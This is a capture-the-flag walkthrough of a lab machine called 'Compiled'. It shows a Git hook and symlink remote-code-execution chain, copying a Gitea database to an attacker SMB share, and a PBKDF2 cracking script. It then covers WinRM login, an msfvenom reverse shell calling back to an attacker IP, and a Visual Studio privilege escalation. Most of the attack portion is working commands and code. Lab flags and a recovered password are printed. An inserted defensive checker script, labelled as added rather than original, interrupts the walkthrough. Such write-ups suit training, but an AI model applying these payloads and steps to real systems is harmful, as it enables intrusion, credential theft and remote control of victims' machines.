[Meachines] [Medium] Compiled: Git RCE + Visual Studio 2019 Privilege Escalation
Word count: 1057 | 2025-08-20 18:17:53
Git RCE + Visual Studio 2019 Privilege Escalation Walkthrough
1. Information Gathering
1.1 Target scan
- Target IP: 10.10.11.26
- Open ports:
  - 3000: Gitea
  - 5000: code compilation service (Werkzeug/3.0.3 Python/3.12.3)
  - 5985: WinRM
1.2 Service identification
- Gitea: http://10.10.11.26:3000/
- Code compilation service: http://10.10.11.26:5000/
- Repository of interest: http://10.10.11.26:3000/richard/Calculator
2. Git Remote Code Execution
2.1 How the vulnerability works
Remote code execution comes from combining a Git post-checkout hook with a symbolic link. The second repository carries a symlink pointing at `.git` and a submodule whose path differs from the symlink name only in case; on a case-insensitive filesystem (such as the Windows build host here) the submodule, including its `hooks` directory, is written inside `.git/`, and Git runs the planted post-checkout hook as soon as the checkout finishes.
2.2 Exploitation steps
- Prepare the environment for the two repositories:

```sh
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main
rm -rf nothing
rm -rf toSeeHere
```

- Clone the first repository (repo1) and add the hook directory:

```sh
git clone http://10.10.11.26:3000/test/repo1.git
cd repo1
mkdir -p y/hooks
```

- Create the malicious post-checkout script and push it:

```sh
cat >y/hooks/post-checkout <<EOF
#!bin/sh.exe
powershell -e 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
EOF
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
```

- Clone the second repository (repo2), add repo1 as a submodule, and add the symlink to `.git`:

```sh
cd ..
git clone http://10.10.11.26:3000/test/repo2.git
cd repo2
git submodule add --name x/y "http://10.10.11.26:3000/test/repo1.git" A/modules/x
git commit -m "add-submodule"
printf ".git" >dotgit.txt
git hash-object -w --stdin <dotgit.txt >dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info
git update-index --index-info <index.info
git commit -m "add-symlink"
git push
```

- Trigger the vulnerability through the compilation service:

```sh
./rev.sh http://10.10.11.26:5000/
```
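As an added defensive check that is not part of the original writeup: this Python script screens a repository's tree listing for the layout used above, a symlink whose target is `.git` combined with another entry (here the submodule) whose first path component matches the link name ignoring case, so a build host can reject such a repository before it is cloned on a case-insensitive filesystem. The `git ls-tree` sample and object ids are constructed.

```python
import re

# Constructed sample of `git ls-tree -r HEAD` output, modelled on the second
# repository laid out above (object ids are made up).
SAMPLE_TREE = (
    "120000 blob 1111111111111111111111111111111111111111\ta\n"
    "100644 blob 2222222222222222222222222222222222222222\t.gitmodules\n"
    "160000 commit 3333333333333333333333333333333333333333\tA/modules/x\n"
    "100644 blob 4444444444444444444444444444444444444444\tREADME.md\n"
)
# Symlink targets, as `git cat-file -p <blob>` would print them (constructed).
SAMPLE_LINK_TARGETS = {"a": ".git"}

# Matches a link target of `.git` or anything under it, e.g. `./.git/hooks`.
DOTGIT_RE = re.compile(r"^(\./)*\.git(/|$)", re.IGNORECASE)

def parse_ls_tree(text):
    """Return (mode, object type, path) tuples from `git ls-tree -r` output."""
    entries = []
    for line in text.splitlines():
        meta, path = line.split("\t", 1)
        mode, kind, _oid = meta.split()
        entries.append((mode, kind, path))
    return entries

def find_dotgit_link_collisions(tree_text, link_targets):
    """Flag entries a checkout could write through a symlink into .git.

    A symlink to .git is dangerous when another entry's first path component
    equals the link name ignoring case: on Windows or default macOS that entry,
    hooks included, is checked out inside .git/.
    """
    entries = parse_ls_tree(tree_text)
    dotgit_links = {
        path.casefold(): path
        for mode, _kind, path in entries
        if mode == "120000" and DOTGIT_RE.match(link_targets.get(path, ""))
    }
    findings = []
    for mode, kind, path in entries:
        if mode == "120000":
            continue
        link = dotgit_links.get(path.split("/", 1)[0].casefold())
        if link is not None:
            findings.append({"path": path, "via_link": link, "type": kind})
    return findings

if __name__ == "__main__":
    for hit in find_dotgit_link_collisions(SAMPLE_TREE, SAMPLE_LINK_TARGETS):
        print(f"suspicious: {hit['type']} {hit['path']} via symlink {hit['via_link']} -> .git")
```

In practice the tree text comes from `git ls-tree -r HEAD` on a bare mirror and the link targets from `git cat-file -p` on each mode-120000 blob, so nothing is checked out while screening.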
3. Obtaining Initial Access
3.1 Retrieving the Gitea database
- Start an SMB share on the attacking machine:

```sh
impacket-smbserver share /tmp/ -smb2support
```

- Copy the database from the target to the share:

```powershell
cp 'C:\\Program Files\Gitea\data\gitea.db' \\10.10.16.75\share
```
3.2 Cracking the user password
- Use a Python script to brute-force the PBKDF2 hash taken from the database (Gitea stores PBKDF2-HMAC-SHA256 with 50000 rounds and a 50-byte key):

```python
import hashlib
import binascii


def derive_pbkdf2_key(candidate, salt, rounds=50000, key_length=50):
    # Same parameters Gitea used to hash the stored password
    return hashlib.pbkdf2_hmac('sha256', candidate.encode('utf-8'), salt, rounds, key_length)


def attempt_password_crack(wordlist_path, target_hash, salt_value, rounds=50000, key_length=50):
    target_hash_bytes = binascii.unhexlify(target_hash)
    try:
        # rockyou.txt contains non-UTF-8 lines, so decode errors are skipped
        with open(wordlist_path, 'r', encoding='utf-8', errors='ignore') as wordlist:
            for entry in wordlist:
                candidate_password = entry.rstrip('\r\n')
                derived_key = derive_pbkdf2_key(candidate_password, salt_value, rounds, key_length)
                if derived_key == target_hash_bytes:
                    print(f"Password match found: {candidate_password}")
                    return candidate_password
    except FileNotFoundError:
        print("Wordlist file not found. Please check the path.")
        return None
    print("No matching password found.")
    return None


# Salt and hash as stored in the user table of gitea.db
salt_value = binascii.unhexlify('227d873cca89103cd83a976bdac52486')
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
wordlist_path = '/usr/share/wordlists/rockyou.txt'
attempt_password_crack(wordlist_path, target_hash, salt_value)
```

- Recovered password: `12345678`
3.3 Logging in via WinRM

```sh
evil-winrm -i 10.10.11.26 -u 'emily' -p '12345678'
```

- User flag: 209380d1c60e610f2cef026e0c237404
4. Privilege Escalation (Visual Studio 2019 vulnerability)
4.1 Preparation
- Generate a reverse shell:

```sh
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.75 LPORT=4444 -f exe -o reverse_shell.exe
```

- Set up the listener:

```sh
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.16.75
set LPORT 4444
run
```

4.2 Locating VSDiagnostics.exe

```powershell
dir C:\VSDiagnostics.exe /s /p
```

4.3 Exploiting CVE-2024-20656
- Fetch the tools from the SMB share:

```powershell
cp \\10.10.16.75\share\RunasCs.exe .
cp \\10.10.16.75\share\Expl.exe .
copy \\10.10.16.75\share\reverse_shell.exe .
```

- Run the privilege escalation:

```powershell
./RunasCs.exe emily 12345678 ./Expl.exe
```

- Root flag: 4910be87423e9b471cc4945f1e5fed7f
5. Key Takeaways
- Git RCE exploitation:
  - Relies on Git hooks and symlink handling
  - Requires two repositories that reference each other
  - Triggered through the code compilation service
- Password cracking:
  - Obtain the Gitea database file
  - Identify the PBKDF2 hash parameters
  - Crack with the rockyou.txt wordlist
- Privilege escalation:
  - Exploits the VSDiagnostics.exe vulnerability in Visual Studio 2019
  - Requires replacing MofCompiler.exe
  - Uses RunasCs to run the exploit as another user
- Tools used:
  - impacket-smbserver: file transfer
  - evil-winrm: Windows remote management
  - msfvenom: payload generation
  - RunasCs: run commands as another user